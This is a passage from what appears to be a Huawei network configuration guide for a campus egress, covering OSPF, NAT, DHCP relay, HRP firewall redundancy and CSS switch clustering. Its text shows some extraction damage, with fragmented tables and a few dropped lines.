[AGG1-ospf-1-area-0.0.0.1] nssa //Configure OSPF area 1 as an NSSA.
[AGG1-ospf-1-area-0.0.0.1] quit
[AGG1-ospf-1] quit
# Configure AGG2.

[AGG2] ospf 1 //Configure OSPF.

[AGG2-ospf-1] area 2 //Configure OSPF area 2.
device to advertise the network segment connected to the CSS to OSPF area 2.
device to advertise the user network segment to OSPF area 1.
[AGG2-ospf-1-area-0.0.0.2] nssa //Configure OSPF area 2 as an NSSA.
[AGG2-ospf-1-area-0.0.0.2] quit
[AGG2-ospf-1] quit
3. Configure a default route pointing to the firewall on the core switch, configure a default
route pointing to the egress router on the firewall, and configure a default route pointing
to the address of the interconnected interface (public gateway address) of the carrier's
device.
[Router1] ip route-static 0.0.0.0 0.0.0.0 202.10.1.2
[Router2] ip route-static 0.0.0.0 0.0.0.0 202.10.2.2
[FW1] ip route-static 0.0.0.0 0.0.0.0 10.1.1.1
[FW2] ip route-static 0.0.0.0 0.0.0.0 10.2.1.1
[CSS] ip route-static 0.0.0.0 0.0.0.0 10.3.1.1
[CSS] ip route-static 0.0.0.0 0.0.0.0 10.4.1.1
Check the routing table of the stack. AGG1 is used as an example. You can see that
routes are generated for network segments on the internal network and one default route
is generated for traffic going out of the NSSA.
[AGG1] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 14 Routes : 14
Destination/Mask Proto Pre Cost Flags NextHop Interface
0.0.0.0/0 O_NSSA 150 1 D 10.5.1.1 Vlanif100

6.6.6.6/32 Direct 0 0 D 127.0.0.1 LoopBack0
10.1.1.0/24 OSPF 10 3 D 10.5.1.1 Vlanif100
10.2.1.0/24 OSPF 10 3 D 10.5.1.1 Vlanif100
10.3.1.0/24 OSPF 10 2 D 10.5.1.1 Vlanif100
10.4.1.0/24 OSPF 10 2 D 10.5.1.1 Vlanif100
10.5.1.0/24 Direct 0 0 D 10.5.1.2 Vlanif100
10.5.1.2/32 Direct 0 0 D 127.0.0.1 Vlanif100
10.6.1.0/24 OSPF 10 2 D 10.5.1.1 Vlanif100
127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
192.168.1.0/24 Direct 0 0 D 192.168.1.1 Vlanif500
192.168.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif500
192.168.2.0/24 OSPF 10 3 D 10.5.1.1 Vlanif100
# Check the routing table in the CSS. You can see routes are generated for network
segments on the internal network and the costs of routes to firewalls are the same,
indicating that load balancing is used.
[CSS] display ip routing-table
------------------------------------------------------------------------------
0.0.0.0/0 Static 60 0 RD 10.3.1.1 Eth-Trunk10

Static 60 0 RD 10.4.1.1 Eth-Trunk20
10.1.1.0/24 OSPF 10 2 D 10.3.1.1 Eth-Trunk10
10.2.1.0/24 OSPF 10 2 D 10.4.1.1 Eth-Trunk20
10.3.1.0/24 Direct 0 0 D 10.3.1.2 Eth-Trunk10


10.5.1.0/24 Direct 0 0 D 10.5.1.1 Vlanif100
10.5.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif100
10.6.1.0/24 Direct 0 0 D 10.6.1.1 Vlanif200
10.6.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif200
10.100.1.0/24 Direct 0 0 D 10.100.1.1 Vlanif300
10.100.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif300
192.168.1.0/24 OSPF 10 2 D 10.5.1.2 Vlanif100
192.168.2.0/24 OSPF 10 2 D 10.6.1.2 Vlanif200
Step 7 Configure DHCP in the CSS and stack.

# Configure the DHCP server in the CSS to allocate IP addresses to users.
[CSS] dhcp enable //Enable DHCP.
[CSS] interface vlanif 100 //Configure the device to allocate IP addresses to
department A through VLANIF 100.
[CSS-Vlanif100] dhcp select global //Configure the device to use the global
address pool.
[CSS] interface vlanif 200 //Configure the device to allocate IP addresses to
department B through VLANIF 100.
[CSS-Vlanif200] dhcp select global //Configure the device to use the global
address pool.
[CSS] ip pool poola //Configure the address pool poola from which IP addresses
are allocated to department A.
[CSS-ip-pool-poola] network 192.168.1.0 mask 24 //Configure a network segment
assigned to department A.
[CSS-ip-pool-poola] gateway-list 192.168.1.1 //Configure a gateway address for
department A.
[CSS-ip-pool-poola] quit
[CSS] ip pool poolb //Configure the address pool poolb from which IP addresses
are allocated to department B.
[CSS-ip-pool-poolb] network 192.168.2.0 mask 24 //Configure a network segment
assigned to department B.
[CSS-ip-pool-poolb] gateway-list 192.168.2.1 //Configure a gateway address for
department B.
[CSS-ip-pool-poolb] quit
# Configure the DHCP relay function on AGG1.

[AGG1] dhcp enable //Enable DHCP.
[AGG1-Vlanif500] dhcp select relay //Configure the DHCP relay function.
[AGG1-Vlanif500] dhcp relay server-ip 10.5.1.1 //Specify the DHCP server's IP
address.
# Configure the DHCP relay function on AGG2.

[AGG2] dhcp enable //Enable DHCP.
[AGG2-Vlanif600] dhcp select relay //Configure the DHCP relay function.
[AGG2-Vlanif600] dhcp relay server-ip 10.6.1.1 //Specify the DHCP server's IP
address.
# Verify the configuration.

Configure clients to obtain IP addresses through the DHCP server and check the address pool
in the CSS. You can see that two IP addresses (Used: 2) have been allocated and there are 503
remaining IP addresses (Idle: 503). That is, IP addresses are allocated successfully.
[CSS] display ip pool
-----------------------------------------------------------------------
Pool-name : poola
Pool-No : 0
Position : Local Status : Unlocked

Gateway-0 : 192.168.1.1
Mask : 255.255.255.0
VPN instance : --
-----------------------------------------------------------------------
Pool-name : poolb
Pool-No : 1
Gateway-0 : 192.168.2.1
Mask : 255.255.255.0
VPN instance : --
IP address Statistic
Total :506
Used :2 Idle :503
Expired :0 Conflict :1 Disable :0
Step 8 Configure NAT on egress routers.

Users on the internal network use private IP addresses. To meet the requirements, perform
NAT configurations:
l To allow users of department A to access the Internet, configure NAT on egress routers
to translate private IP addresses into public IP addresses.
l To allow users on the external network to access the HTTP server, configure the NAT
server on egress routers.
NOTE
Assume that the carrier allocate the following public IP addresses to enterprise users: 202.10.1.2 to
202.10.1.10 and 202.10.2.2 to 202.10.2.10. The IP addresses of 202.10.1.2 and 202.10.2.2 are used by
Router1 and Router 2 respectively to connect to the external network. The IP address 202.10.1.10 is
used by users on the external network to access the HTTP server. Users on the internal network use the
remaining public IP addresses to access the Internet.
# Configure NAT on Router1 to translate IP addresses of users in department A into public IP

addresses so that users in department A can access the Internet.
[Router1] nat address-group 1 202.10.1.3 202.10.1.9 //Configure a NAT address
pool, including public IP addresses allocated by the carrier.
[Router1] acl number 2000
[Router1-acl-basic-2000] rule permit source 192.168.1.0 0.0.0.255 //Configure a
NAT address pool, including public IP addresses allocated by the carrier.
[Router1-acl-basic-2000] quit
[Router1-GigabitEthernet0/0/2] nat outbound 2000 address-group 1 //Configure
NAT on the interface connected to the external network.
# Configure NAT on Router2 to translate IP addresses of users in department A into public IP

addresses.
[Router2] nat address-group 1 202.10.2.3 202.10.2.10 //Configure a NAT address
pool, including public IP addresses allocated by the carrier.
[Router2] acl number 2000

[Router2-acl-basic-2000] rule permit source 192.168.1.0 0.0.0.255 //Configure
an address segment which can be used to access the external network.
[Router2-acl-basic-2000] quit
[Router2-GigabitEthernet0/0/2] nat outbound 2000 address-group 1 //Configure
NAT on the interface connected to the external network.
[Router2] display nat outbound
NAT Outbound Information:

-------------------------------------------------------------------------
Interface Acl Address-group/IP/Interface Type
-------------------------------------------------------------------------
GigabitEthernet0/0/2 2000 1 pat
-------------------------------------------------------------------------
Total : 1
# Configure the NAT server on Router1 and Router2 so that users on the external network can
access the HTTP server.
[Router1-GigabitEthernet0/0/2] nat server protocol tcp global 202.10.1.10 http
inside 10.100.1.1 http //Configure the device to allow Internet users to access
the HTTP server of the company.
[Router2-GigabitEthernet0/0/2] nat server protocol tcp global 202.10.1.10 http
inside 10.100.1.1 http //Configure the device to allow Internet users to access
the HTTP server of the company.
Step 9 Configure HRP on firewalls.

# On FW1, associate VGMP groups with uplink and downlink interfaces.
[FW1] hrp track interface gigabitethernet 1/0/1 //Associate a VGMP group with
an uplink interface.
[FW1] hrp track interface eth-trunk 10 //Associate a VGMP group with a
downlink interface.
# On FW1, adjust the OSPF cost based on the HRP status.

[FW1] hrp adjust ospf-cost enable
# On FW2, associate VGMP groups with uplink and downlink interfaces.

[FW2] hrp track interface gigabitthernet 1/0/1 //Associate a VGMP group with
an uplink interface.
[FW2] hrp track interface eth-trunk 20 //Associate a VGMP group with a
downlink interface.
# On FW2, adjust the OSPF cost based on the HRP status.

[FW2] hrp adjust ospf-cost enable
# On FW1, specify a heartbeat interface and enable HRP.

[FW1] hrp interface gigabitethernet 1/0/7 remote 10.10.1.2 //Configure a
heartbeat interface and enable HRP.
[FW1] hrp enable //Enable HSB.
HRP_M[FW1] hrp mirror session enable //Enable quick session backup. In HRP
networking, if packets are received and sent along different paths, the quick
session backup function ensures that session information on the active firewall
is immediately synchronized to the standby firewall. When the active firewall
fails, packets can be forwarded by the standby firewall. This function ensures
nonstop sessions of internal and external users.
NOTE
After HRP is configured, the configuration and session of the active device are automatically backed up to the
standby device.
# On FW2, specify a heartbeat interface and enable HRP.

[FW2] hrp interface gigabitethernet 1/0/7 remote 10.10.1.1 //Configure a
heartbeat interface and enable HRP.
[FW2] hrp enable //Enable HRP.
HRP_B[FW2] hrp mirror session enable //Enable quick session backup. In HRP
networking, if packets are received and sent along different paths, the quick
session backup function ensures that session information on the active firewall
is immediately synchronized to the standby firewall. When the active firewall
fails, packets can be forwarded by the standby firewall. This function ensures
nonstop sessions of internal and external users.

HRP_M[FW1] display hrp state

Role: active, peer: active
Running priority: 49012, peer: 49012
Core state: normal, peer: normal
Backup channel usage: 3%
Stable time: 0 days, 5 hours, 1 minutes
The local and remote firewalls have the same priority and are both in active state, indicating
that the two firewalls are in load balancing state.
Step 10 Configure attack defense on firewalls.
To protect internal servers against potential SYN Flood attacks and HTTP Flood attacks,
enable defense against SYN Flood attacks and HTTP Flood attacks on firewalls.
NOTE
The attack defense threshold is used for reference. Set this value according to actual network traffic.
HRP_M[FW1] firewall defend syn-flood enable
HRP_M[FW1] firewall defend syn-flood zone untrust max-rate 20000
HRP_M[FW1] firewall defend udp-flood enable
HRP_M[FW1] firewall defend udp-flood zone untrust max-rate 1500
HRP_M[FW1] firewall defend icmp-flood enable
HRP_M[FW1] firewall defend icmp-flood zone untrust max-rate 20000
HRP_M[FW1] firewall blacklist enable
HRP_M[FW1] firewall defend ip-sweep enable
HRP_M[FW1] firewall defend ip-sweep max-rate 4000
HRP_M[FW1] firewall defend port-scan enable
HRP_M[FW1] firewall defend port-scan max-rate 4000
HRP_M[FW1] firewall defend ip-fragment enable
HRP_M[FW1] firewall defend ip-spoofing enable
----End
Configuration Files
l Configuration file of Router1
#
sysname Router1
#
acl number 2000
rule permit source 192.168.1.0 0.0.0.255
#
nat address-group 1 202.10.1.3 202.10.1.9
#
interface GigabitEthernet 0/0/1
ip address 10.1.1.1 255.255.255.0
#
ip address 202.10.1.1 255.255.255.0
nat outbound 2000 address-group 1
nat server protocol tcp global 202.10.1.10 http inside 10.100.1.10 http
#
interface LoopBack0
ip address 1.1.1.1 255.255.255.255
#
ospf 1 router id 1.1.1.1
area 0.0.0.0
network 10.1.1.0 0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 202.10.1.2
#
return
l Configuration file of Router2

#
sysname Router2
#

acl number 2000

rule permit source 192.168.1.0 0.0.0.255
#
nat address-group 1 202.10.2.3 202.10.2.10 mask 255.255.255.0
#
ip address 10.2.1.1 255.255.255.0
#
ip address 202.10.2.1 255.255.255.0
nat outbound 2000 address-group 1
nat server protocol tcp global 202.10.1.10 http inside 10.100.1.10 http
#
interface LoopBack0
ip address 2.2.2.2 255.255.255.255
#
ospf 1 router id 2.2.2.2
area 0.0.0.0
network 10.2.1.0 0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 202.10.2.2
#
return
l Configuration file of FW1

#
sysname FW1
#
router id 3.3.3.3
#
hrp mirror session enable
hrp adjust ospf-cost enable
hrp enable
hrp interface GigabitEthernet 1/0/7 remote 10.10.1.2
hrp track interface GigabitEthernet1/0/1
hrp track interface Eth-Trunk 10
#
interface Eth-Trunk 10
ip address 10.3.1.1 255.255.255.0
#
ip address 10.1.1.2 255.255.255.0
#
ip address 10.10.1.1 255.255.255.0
#
eth-trunk 10
#
eth-trunk 10
#
interface LoopBack0
ip address 3.3.3.3 255.255.255.255
#
firewall zone trust
set priority 85
add interface Eth-Trunk10
#
firewall zone dmz
set priority 50
add interface GigabitEthernet1/0/7
#
firewall zone untrust
set priority 5
add interface GigabitEthernet 1/0/1
#
ospf

1
area 0.0.0.0
network 10.1.1.0 0.0.0.255
network 10.3.1.0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 10.1.1.1
#
policy interzone local trust outbound
policy 1
action permit
policy source 10.3.1.0 mask 24
#
policy interzone local untrust inbound
policy 2
action permit
#
policy interzone trust untrust inbound
policy 3
action permit
#
policy interzone trust untrust outbound
policy 4
action permit
#
firewall defend syn-flood enable
firewall defend syn-flood zone untrust max-rate 20000
firewall defend udp-flood enable
firewall defend udp-flood zone untrust max-rate 1500
firewall defend icmp-flood enable
firewall defend icmp-flood zone untrust max-rate 20000
firewall blacklist enable
firewall defend ip-sweep enable
firewall defend ip-sweep max-rate 4000
firewall defend port-scan enable
firewall defend port-scan max-rate 4000
firewall defend ip-fragment enable
firewall defend ip-spoofing enable
#
return
l Configuration file of FW2

#
sysname FW2
#
router id 4.4.4.4
#
hrp mirror session enable
hrp adjust ospf-cost enable
hrp enable
hrp interface GigabitEthernet 1/0/7 remote 10.10.1.1
hrp track interface GigabitEthernet1/0/1
hrp track interface Eth-Trunk 20
#
ip address 10.4.1.1 255.255.255.0
#
ip address 10.2.1.2 255.255.255.0
#
ip address 10.10.1.2 255.255.255.0
#
eth-trunk 20

#
eth-trunk 20
#
interface LoopBack0
ip address 4.4.4.4 255.255.255.255
#
firewall zone trust
set priority 85
#
firewall zone dmz
set priority 50
#
set priority 5
add interface GigabitEthernet 1/0/1
#
ospf
1
area 0.0.0.0
network 10.2.1.0 0.0.0.255
network 10.4.1.0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 10.2.1.1
#
policy interzone local trust outbound
policy 1
action permit
#
policy interzone local untrust inbound
policy 2
action permit
#
policy interzone trust untrust inbound
policy 3
action permit
#
firewall defend syn-flood enable
firewall defend syn-flood zone untrust max-rate 20000
firewall defend udp-flood enable
firewall defend udp-flood zone untrust max-rate 1500
firewall defend icmp-flood enable
firewall defend icmp-flood zone untrust max-rate 20000
firewall blacklist enable
firewall defend ip-sweep enable
firewall defend ip-sweep max-rate 4000
firewall defend port-scan enable
firewall defend port-scan max-rate 4000
firewall defend ip-fragment enable
firewall defend ip-spoofing enable
#
return
l Configuration file of the CSS

#
sysname CSS
#
vlan batch 100 200 300

#
dhcp enable
#

ip pool poola
gateway-list
192.168.1.1
network 192.168.1.0 mask
255.255.255.0
#
ip pool poolb
gateway-list
192.168.2.1
255.255.255.0
#
interface Vlanif 100
ip address 10.5.1.1 255.255.255.0
dhcp select global
#
ip address 10.6.1.1 255.255.255.0
dhcp select global
#
ip address 10.100.1.100 255.255.255.0
#
undo portswitch
ip address 10.3.1.2 255.255.255.0
#
undo portswitch
ip address 10.4.1.2 255.255.255.0
#
port link-type hybrid
port hybrid pvid vlan 100
port hybrid untagged vlan 100
#
#
interface GigabitEthernet 1/1/0/1
port link-type access
port default vlan 300
#
eth-trunk 10
#
eth-trunk 20
#
eth-trunk 100
#
eth-trunk 200
#
eth-trunk 10
#
eth-trunk 20
#
eth-trunk 100
#
eth-trunk 200
#

interface LoopBack0
ip address 5.5.5.5 255.255.255.255
#
ospf 1 router-id
5.5.5.5
area 0.0.0.0
network 10.3.1.0 0.0.0.255
network 10.4.1.0 0.0.0.255
network 10.100.1.0 0.0.0.255
area 0.0.0.1
network 10.5.1.0 0.0.0.255
area 0.0.0.2
network 10.6.1.0 0.0.0.255
#
ip route-static 0.0.0.0 0.0.0.0 10.3.1.1
ip route-static 0.0.0.0 0.0.0.0 10.4.1.1
#
return
l Configuration file of AGG1

#
sysname AGG1
#
vlan batch 100 500

#
ip address 10.5.1.2 255.255.255.0
#
ip address 192.168.1.1 255.255.255.0
dhcp select relay
dhcp relay server-ip 10.5.1.1
#
#
#
eth-trunk 100
#
eth-trunk 100
#
eth-trunk 500
#
eth-trunk 500
#
interface LoopBack0
ip address 6.6.6.6 255.255.255.255
#
ospf 1 router-id
6.6.6.6
area 0.0.0.1
network 10.5.1.0 0.0.0.255
network 192.168.1.0 0.0.0.255
nssa
#
return

l Configuration file of AGG2

#
sysname AGG2
#
vlan batch 200 600

#
ip address 10.6.1.2 255.255.255.0
#
ip address 192.168.2.1 255.255.255.0
dhcp select relay
#
#
#
eth-trunk 200
#
eth-trunk 200
#
eth-trunk 600
#
eth-trunk 600
#
interface LoopBack0
ip address 7.7.7.7 255.255.255.255
#
ospf 1 router-id
7.7.7.7
area 0.0.0.2
network 10.6.1.0 0.0.0.255
network 192.168.2.0 0.0.0.255
nssa
#
return
2.3 Example for Configuring the Egress of a Large-scale

Campus (Firewalls Are Connected to Core Switches in
Bypass Mode)
Configuration Notes
l This example uses Huawei S series modular switches, USG firewalls, and NE routers to
describe the configuration procedure.
l The configuration procedure in this example involves only the enterprise network egress.
For the internal network configuration, see "Large-Sized Campus Networks" in the
Huawei S Series Campus Switch Quick Configuration Guide.

l Only the connection configurations between firewalls and switches and the HRP
configurations on firewalls are provided in the following procedure. For the security
service plan on the firewalls and security policies, attack defense, bandwidth
management, and IPSec on the campus network, see Firewall Configuration Examples.
l This example describes only the routers and switches at the egress of campus network.
For the Internet-side configurations on routers, see the NE Router Configuration Guide.
At the egress of a large-sized campus network, core switches connect to routers to access the
Internet through upstream interfaces. Firewalls connect to the core switches in bypass mode to
filter service traffic.
To simplify network and improve reliability, a switch cluster is deployed at the core layer.
HRP (active/standby mode) is deployed on firewalls. If one firewall fails, services are
switched to another firewall.
Each of the core switches is dual homed to two egress routers, and VRRP is configured
between routers to ensure reliability.
To improve link reliability, Eth-Trunks are configured between core switches and egress
routers, core switches and firewalls, and two firewalls.
The networking diagram is as follows.

Figure 2-6 Networking diagram at the campus egress (HRP firewalls in bypass mode)
Traffic from the
Internet to intranet
Internet Traffic from the

intranet to Internet
Campus egress
Router 1 Router 2
VRRP VRID 1
FW 1
CSS HRP
FW 2
Aggregation Aggregation
switch switch
Service Service
network 1 network 2
In Layer 3 forwarding environment, traffic inside and outside the campus network is directly
forwarded by switches, but does not pass through FW1 and FW2. When traffic needs to be
forwarded to FWs for filtering through switches, the VRF function must be configured on
switches. The CSS is divided into a virtual switch VRF-A and a root switch Public, which are
separated from each other.
Public is connected to the egress routers, and forwards traffic from the Internet to FWs for
filtering and traffic from FWs to the egress routers.
VRF-A is connected to the intranet, and forwards traffic from FWs to the intranet and traffic
from intranet to FWs for filtering.
The following logical network diagram shows the traffic forwarding paths.

Figure 2-7 Connections between physical interfaces of switches, routers, and firewalls
Traffic from the

Internet
Traffic from the
Router 1 Router 2
10GE1/0/1 10GE1/0/2 10GE1/0/1 10GE1/0/2
10GE1/4/0/0 10GE2/4/0/0 10GE2/4/0/1

10GE1/4/0/1
Switch 1 Switch 2
(master) CSS
(backup)
Internet-side
Public
GE1/1/0/7 GE1/2/0/7 GE2/1/0/7 GE2/2/0/7
GE1/0/0 GE1/0/1 GE1/0/0 GE1/0/1
GE2/0/0 GE2/0/0
FW 1 GE2/0/1 GE2/0/1 FW 2
GE1/1/0 GE1/1/1 GE1/1/0 GE1/1/1
GE1/1/0/8 GE1/2/0/8 GE2/1/0/8 GE2/2/0/8
Switch 1 CSS Switch 2

(master) (backup)
Intranet-side
GE1/3/0/1 GE1/3/0/2 VRF-A GE2/3/0/1 GE2/3/0/2
switch switch
Service Service
network 1 network 2

In this example, the core switches work in Layer 3 mode. The firewalls connect to Layer 3
switches through upstream and downstream interfaces. VRRP needs to be configured on both
upstream and downstream service interfaces of firewalls, as shown below.

Figure 2-8 Connections between Layer 3 interfaces of switches, routers, and firewalls
Traffic from the

Internet
Traffic from the
Router 1 Router 2
10.10.4.2/24 10.10.4.3/24
VRRP VRID 1
CSS
1OSPF
Virtual IP
Eth-Trunk1
3 Static route
10.10.4.100/24
Eth-Trunk2
OSPF VLANIF10
100 10.10.4.1/24
Area 0
CSS
Internet-side
Public CSS
2 Static route
Eth-Trunk4
Eth-Trunk6
2 Static route
VLANIF20
Virtual IP 10.10.2.1/24
10.10.2.5/24
Upstream VRRP VRID 1

Untrust: Eth-Trunk4 Untrust: Eth-Trunk6
10.10.2.2/24 10.10.2.3/24
Static route
FW 1 Eth-Trunk1 Eth-Trunk1 FW 2
10.1.1.1/24 10.1.1.2/24
Trust:Eth-Trunk5 Trust: Eth-Trunk7

10.10.3.2/24 10.10.3.3/24
Downstream VRRP VRID 2
3 Static route
Virtual IP CSS
1 Static route
10.10.3.5/24 Eth-Trunk5
Eth-Trunk7
Eth-Trunk5 Eth-Trunk7 VLANIF30
10.10.3.1/24
Intranet-side
VRF-A
CSS
VLANIF100 VLANIF200
10.10.100.1/24 10.10.200.1/24
switch switch
Service Service
network 1 network 2

The traffic (in blue) from the intranet to the Internet is forwarded as follows:
1. When traffic from the intranet to the Internet reaches VRF-A, it is then forwarded to the
firewalls based on the static route (next hop is the downstream VRRP virtual IP address
of firewalls) configured on VRF-A.
2. After filtering the traffic, the firewalls forward traffic to Public based on the static route
(next hop is the CSS's VLANIF 20).
3. Public forwards traffic to routers based on the static route (next hop is the router VRRP
virtual IP address).
The traffic (in red) from the Internet to the intranet is forwarded as follows:
1. The traffic from the Internet to the intranet reaches the routers, and is then forwarded to
Public based on the OSPF routing table.
2. Public forwards the traffic to firewalls based on the static route (next hop is the upstream
VRRP virtual IP address of firewalls).
3. After filtering the traffic, the firewalls forward traffic to VRF-A based on the static route
(next hop is the CSS's VLANIF 30).
4. VRF-A forwards the traffic to aggregation switches based on OSPF routing table, and
then the aggregation switches forward the traffic to service networks.
Data Plan
Table 2-4 Link aggregation data plan

Devi Interfac Member VLAN IP Address Remote Remote
ce e Interface IF Device Interface
Numbe Number
r
Rout Eth- 10GE1/0/ - 10.10.4.2/24 Switch 1 Eth-Trunk1

er1 trunk1.1 1 Switch 2
00 10GE1/0/
2
Rout Eth- 10GE1/0/ - 10.10.4.3/24 Switch 1 Eth-Trunk2

er2 trunk1.1 1 Switch 2
00 10GE1/0/
2
VRR - - - 10.10.4.100/ - -
P of 24
Rout
er 1
and
Rout
er 2


Numbe Number
r
CSS Eth- 10GE1/4/ VLANI 10.10.4.1/24 Router 1 Eth-Trunk1

(Swit trunk1 0/0 F10
ch 1 10GE2/4/
and 0/0
Switc
h 2) Eth- 10GE1/4/ VLANI 10.10.4.1/24 Router 2 Eth-Trunk1
trunk2 0/1 F10
10GE2/4/
0/1
Eth- GE1/1/0/ VLANI 10.10.2.1/24 FW 1 Eth-Trunk4

trunk4 7 F20
GE2/1/0/
7

trunk5 8 F30
GE2/1/0/
8

trunk6 7 F20
GE2/2/0/
7

trunk7 8 F30
GE2/2/0/
8
Eth- GE1/3/0/ VLANI 10.10.100.1/ Service - (omitted in

trunk8 1 F100 24 network 1 this example)
GE2/3/0/
1
Eth- GE1/3/0/ VLANI 10.10.200.1/ Service - (omitted in

trunk9 2 F200 24 network 2 this example)
GE2/3/0/
2
FW1 Eth- GE2/0/0 - 10.1.1.1/24 FW2 Eth-Trunk1

trunk1 GE2/0/1
Eth- GE1/0/0 - 10.10.2.2/24 Switch 1 Eth-Trunk4

Trunk4 GE1/0/1 Switch 2


Numbe Number
r

FW2 Eth- GE2/0/0 - 10.1.1.2/24 FW1 Eth-Trunk1

trunk1 GE2/0/1


VRR - - - 10.10.2.5/24 - -
P1 of
FW 1
and
FW 2
(upstr
eam)
VRR - - - 10.10.3.5/24 - -
P2 of
FW 1
and
FW 2
(dow
nstre
am)
1. Configure the CSS for core switches.

2. Assign IP addresses to the interfaces between switches, firewalls, and routers.
To improve link reliability, configure inter-chassis Eth-Trunks between switches and
firewalls and between switches and routers.
Configure security zones on the firewalls' interfaces.
3. Configure VRRP on egress routers.
To ensure reliability between the core switches and two egress routers, deploy VRRP
between the two egress routers so that VRRP heartbeat packets are exchanged through
the core switches. Router1 functions as the master device, and Router2 functions as the
backup device.
4. Deploy routing.

Configure the VRF function on switches to divide the CSS into a virtual switch VRF-A
and a root switch Public, which separate the service network routes and public network
routes.
To steer the upstream traffic on each device, configure a default route on core switches,
of which the next hop is the VRRP virtual IP address of the egress routers.
To steer the return traffic of two egress routers, configure OSPF between the egress
routers and core switches, and advertise all user network segment routes on the core
switches into OSPF on egress routers.
To forward the upstream traffic of service networks to firewalls, configure a default route
on switches, of which the next hop is the virtual IP address of VRRP VRID2 on
firewalls.
To forward the downstream traffic of service network 1 to firewalls, configure a default
route on switches, of which the next hop is the virtual IP address of VRRP VRID1 on
firewalls.
To forward the downstream traffic of service network 2 to firewalls, configure a default
route on switches, of which the next hop is the virtual IP address of VRRP VRID1 on
firewalls.
To forward the upstream traffic of service networks to switches, configure a default route
on firewalls, of which the next hop is the IP address of VLANIF 20 on switches.
To forward the downstream traffic of service network 1 to switches, configure a default
route on firewalls, of which the next hop is the IP address of VLANIF 30 on switches.
To forward the downstream traffic of service network 2 to switches, configure a default
route on firewalls, of which the next hop is the IP address of VLANIF 30 on switches.
5. Configure HRP on firewalls.
Procedure
Step 1 On switche 1 and switch 2: Configure CSSs.
1. Connect CSS cards through cables.
In the following figure, the S12700 switches have the CSS cards EH1D2VS08000
installed. An S12700 has a maximum number of MPUs, SFUs, and CSS cards installed.
Each chassis must have at least one MPU and one SFU installed. You are advised to
install two SFUs and two CSS cards in each chassis.

Figure 2-9 CSS card connections
NOTE
– The two chassis are connected by at least one CSS cable.

– One CSS card can only be connected to one CSS card in the other chassis but not the local
chassis.
– An interface in group 1 of a CSS card can only be connected to any interface in group 1 of the
CSS card on the other chassis. The requirements for interfaces in group 2 are the same.
– CSS cards have the same number of cluster cables connected. (If the CSS cards have different
numbers of cluster cables connected, the total cluster bandwidth depends on the cluster with
the least cluster cables connected.) In addition, interfaces on CSS cards are connected based on
interface numbers.
2. Configure clustering on Switch 1.
# Set the cluster mode to CSS card (the default value does not need to be configured).
Retain the default cluster ID 1 (the default value does not need to be configured) and set
the priority to 100.
[HUAWEI] set css mode css-card //Default setting. You do not need to run
this command. The step is used for reference.
[HUAWEI] set css id 1 //Default setting. You do not need to run this
command. The step is used for reference.
[HUAWEI] set css priority 100 //The default CSS priority is 1. Change the
priority of the master switch to be higher than that of the backup switch.
[HUAWEI] css enable
rebooted. The next CSS mode is CSS-card. Reboot now? [Y/N]:y //Restart the
switch.
3. Configure clustering on Switch 2.

Set the cluster mode to CSS card (the default value does not need to be configured). Set
the CSS ID to 2 and retain the default priority 1 (the default value does not need to be
configured).

[HUAWEI] set css id 2 //The default CSS ID is 1. Change the CSS ID to 2.
[HUAWEI] css enable
rebooted. The next CSS mode is CSS-card. Reboot now? [Y/N]:y //Restart the
switch.
4. Check the CSS status after the switches restart.

– On Switch 1, the active switch of the CSS, the MASTER indicator on the active
MPU is steady green. (Figure 1)
– On Switch 1, the CSS ID indicators numbered 1 on both MPUs are steady green.
On Switch2, the CSS ID indicators numbered 2 on both MPUs are steady green.
(Figure 1)
– The LINK/ALM indicators of interfaces on all CSS cards connected to cluster
cables are steady green. (Figure 2)
– The MASTER indicators on all CSS cards in the active chassis are steady green,
and the MASTER indicators on all CSS cards in the standby chassis are off. (Figure
2)
Figure 2-10 Indicators of the MPU and CSS card
NOTE
– After the CSS is established, subsequent operations will be performed on the master switch
(switch 1) and data will be automatically synchronized to the standby switch (switch 2).
– The interface name in a CSS is in the format like 10GE1/4/0/0. The leftmost part indicates the
CSS ID.
Step 2 On switch 1: Configure the inter-chassis Eth-Trunks between CSS and FWs and between CSS
and routers. Configure VLANIF interfaces on the CSS and assign IP addresses to them.
1. Configure an inter-chassis Eth-Trunk between switches and routers. Configure VLANIF
interfaces and assign IP addresses to them.

# In the CSS, create Eth-Trunk1 to connect to Router1 and add member interfaces to
Eth-Trunk1.
[HUAWEI] sysname CSS //Rename the CSS.
[CSS] interface Eth-Trunk 1
[CSS] interface XGigabitethernet 1/4/0/0 //Add an interface on the master
switch to Eth-Trunk1.
[CSS-XGigabitEthernet1/4/0/0] Eth-Trunk 1
[CSS-XGigabitEthernet1/4/0/0] quit
[CSS] interface XGigabitethernet 2/4/0/0 //Add an interface on the backup
# In the CSS, create Eth-Trunk2 to connect to Router2 and add member interfaces to
Eth-Trunk2.
[CSS] interface XGigabitethernet 1/4/0/1 //Add an interface on the master
[CSS] interface XGigabitethernet 2/4/0/1 //Add an interface on the backup
# Create VLANIF interfaces and assign IP addresses to them.

[CSS] vlan batch 10
[CSS] interface Eth-Trunk 1 //Add Eth-Trunk1 to VLAN 10.
[CSS-Eth-Trunk1] port link-type trunk
[CSS-Eth-Trunk1] port trunk allow-pass vlan 10
[CSS] interface Vlanif 10 //Create VLANIF 10 for the CSS to communicate
with Router1 and Router2.
[CSS-Vlanif10] ip address 10.10.4.1 24
[CSS-Vlanif10] quit
2. Configure the inter-chassis Eth-Trunks between switches and FWs and between CSS and
routers. Configure VLANIF interfaces on the CSS and assign IP addresses to them.
# In the CSS, create Eth-Trunk4 to connect Public to FW1 and add member interfaces to
Eth-Trunk4.
[CSS] interface Gigabitethernet 1/1/0/7 //Add an interface on the master
[CSS-Gigabitethernet1/1/0/7] Eth-Trunk 4
[CSS-Gigabitethernet1/1/0/7] quit
[CSS] interface Gigabitethernet 2/1/0/7 //Add an interface on the backup
# In the CSS, create Eth-Trunk5 to connect VRF-A to FW1 and add member interfaces
